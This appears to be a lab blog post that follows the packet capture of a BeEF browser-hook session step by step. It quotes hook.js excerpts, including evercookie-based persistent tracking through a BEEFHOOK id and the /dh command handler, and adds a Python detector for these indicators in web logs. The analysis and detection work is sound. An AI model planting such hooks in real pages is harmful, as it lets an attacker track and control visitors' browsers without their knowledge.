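After setting up BeEF, I wanted to do a quick packet capture and analyze the traffic.
This is the first packet; follow its stream.
The demo page is returned, and it contains a script.
window.location.protocol is the protocol (http) and window.location.host is the host plus port number; the part underlined in red loads http://host:3000/hook.js
Continuing to follow the data stream, the browser sends a GET request for hook.js.
Continue following the data stream.
hook.js is returned.
There is a lot of content... I can't make sense of it.
Following the packets further, a request that submits parameters shows up.
Search hook.js for dh to find out what it does.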
```javascript
/*!
 * @literal object: beef.net
 *
 * Provides basic networking functions,
 * like beef.net.request and beef.net.forgeRequest,
 * used by BeEF command modules and the Requester extension,
 * as well as beef.net.send which is used to return commands
 * to BeEF server-side components.
 *
 * Also, it contains the core methods used by the XHR-polling
 * mechanism (flush, queue)
 */
beef.net = {
    host: "192.168.170.132",
    port: "3000",
    hook: "/hook.js",
    httpproto: "http",
    handler: '/dh',
    chop: 500,
    pad: 30, //this is the amount of padding for extra params such as pc, pid and sid
    sid_count: 0,
    cmd_queue: [],
    // ... (excerpt ends here)
```
Continue following the stream.
Search hook.js for BEEFHOOK.
```javascript
/*!
 * @literal object: beef.session
 *
 * Provides basic session functions.
 */
beef.session = {
    hook_session_id_length: 80,
    hook_session_id_chars: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",
    ec: new evercookie(),
    beefhook: "BEEFHOOK",

    /**
     * Gets a string which will be used to identify the hooked browser session
     *
     * @example: var hook_session_id = beef.session.get_hook_session_id();
     */
    get_hook_session_id: function() {
        // check if the browser is already known to the framework
        var id = this.ec.evercookie_cookie(beef.session.beefhook);
        if (typeof id == 'undefined') {
            var id = this.ec.evercookie_userdata(beef.session.beefhook);
        }
        if (typeof id == 'undefined') {
            var id = this.ec.evercookie_window(beef.session.beefhook);
        }

        // if the browser is not known create a hook session id and set it
        if ((typeof id == 'undefined') || (id == null)) {
            id = this.gen_hook_session_id();
            this.set_hook_session_id(id);
        }

        // return the hooked browser session identifier
        return id;
    },
    // ... (excerpt ends here)
```
The packets after that just keep repeating the last two requests.
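The traffic pattern traced above (a fetch of /hook.js, requests to the /dh handler, an 80-character alphanumeric BEEFHOOK id, and repeated polling) can be turned into a detection check over proxy or web-server logs. The following is an added example, not code from the original post or from BeEF; the record format, the indicator names, the polling threshold, and the assumption that the id appears as a BEEFHOOK query parameter or cookie are all choices made for this example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Values taken from the hook.js excerpts on this page.
HOOK_PATH, HANDLER_PATH, SESSION_NAME = "/hook.js", "/dh", "BEEFHOOK"
SESSION_ID_RE = re.compile(r"[A-Za-z0-9]{80}")  # hook_session_id_length / _chars

SID = "a1B2" * 20  # constructed 80-character session id
# Constructed records: (client IP, request line, Cookie header value).
SAMPLE = [
    ("10.0.0.5", "GET /demos/basic.html HTTP/1.1", ""),
    ("10.0.0.5", "GET /hook.js HTTP/1.1", ""),
    ("10.0.0.5", "GET /dh?sid=0&pid=1&pc=1 HTTP/1.1", f"BEEFHOOK={SID}"),
    ("10.0.0.5", f"GET /hook.js?BEEFHOOK={SID} HTTP/1.1", ""),
    ("10.0.0.5", f"GET /hook.js?BEEFHOOK={SID} HTTP/1.1", ""),
    ("10.0.0.5", f"GET /hook.js?BEEFHOOK={SID} HTTP/1.1", ""),
    ("10.0.0.9", "GET /index.html HTTP/1.1", "session=abc; BEEFHOOK=short"),
]

def session_ids(query, cookie):
    """Return well-formed BEEFHOOK values from the query string or Cookie header."""
    found = parse_qs(query).get(SESSION_NAME, [])
    for part in cookie.split(";"):
        name, _, value = part.strip().partition("=")
        if name == SESSION_NAME:
            found.append(value)
    return [v for v in found if SESSION_ID_RE.fullmatch(v)]

def detect(records, min_polls=3):
    """Map client IP -> set of indicator names observed for that client."""
    hits, polls = defaultdict(set), defaultdict(int)
    for client, request_line, cookie in records:
        parts = request_line.split()
        if len(parts) != 3:
            continue  # skip malformed request lines
        url = urlsplit(parts[1])
        ids = session_ids(url.query, cookie)
        if url.path == HOOK_PATH:
            hits[client].add("hook_fetch")
            for sid in ids:
                polls[(client, sid)] += 1  # same id fetching hook.js again
                if polls[(client, sid)] >= min_polls:
                    hits[client].add("polling")
        if url.path == HANDLER_PATH:
            hits[client].add("handler_request")
        if ids:
            hits[client].add("session_id")
    return dict(hits)

if __name__ == "__main__":
    print(detect(SAMPLE))
```

A client that shows several indicators together is a stronger signal than a lone /hook.js fetch, since that filename is not unique to BeEF.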
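Pick a feature at random and try it.
Result:
Look at the packets.
Something changes after one of the requests for hook.js.
The corresponding packet:
The attack parameters I entered are visible.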